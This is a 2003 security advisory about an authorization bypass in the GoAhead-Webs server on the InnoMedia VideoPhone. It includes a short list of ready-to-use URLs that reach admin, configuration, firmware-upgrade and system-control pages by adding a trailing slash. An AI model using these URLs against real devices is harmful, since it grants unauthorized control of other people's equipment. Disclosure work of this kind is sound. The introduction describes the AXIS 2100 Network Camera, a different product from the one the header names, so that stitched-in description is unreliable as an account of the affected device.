Application: InnoMedia VideoPhone Server: GoAhead-Webs Vendors: InnoMedia Pte Ltd GoAhead Ltd http://www.innomedia.com/ http://www.goahead.com/ Versions: au75200xvi04010x Platforms: Windows Bug: Authorization Bypass Risk: High Exploitation: remote with browser Date: 25 Dec 2003 Author: Rafel Ivgi, The-Insider e-mail: email@example.com web: http://theinsider.deep-ice.com
1) Introduction 2) Bugs 3) The Code
=============== 1) Introduction ===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.
====== 2) Bug ======
Browsing the server normally http://<host>/ Will show some info about the server. The server's menu appears on the left side and contains a few links to protected files, which setup the server's settings/configuration. When refering to any of the menu's "protected" links, such as: http://<host>/videophone_admindetail.asp A "Basic Authorization" request pops up. This authorization can be easily bypassed by refering to the same file as a folder. http://<host>/videophone_admindetail.asp/
=========== 3) The Code ===========
http://<host>/videophone_admindetail.asp/ http://<host>/videophone_syscfg.asp/ http://<host>/videophone_upgrade.asp/ http://<host>/videophone_sysctrl.asp/
Rafel Ivgi, The-Insider http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."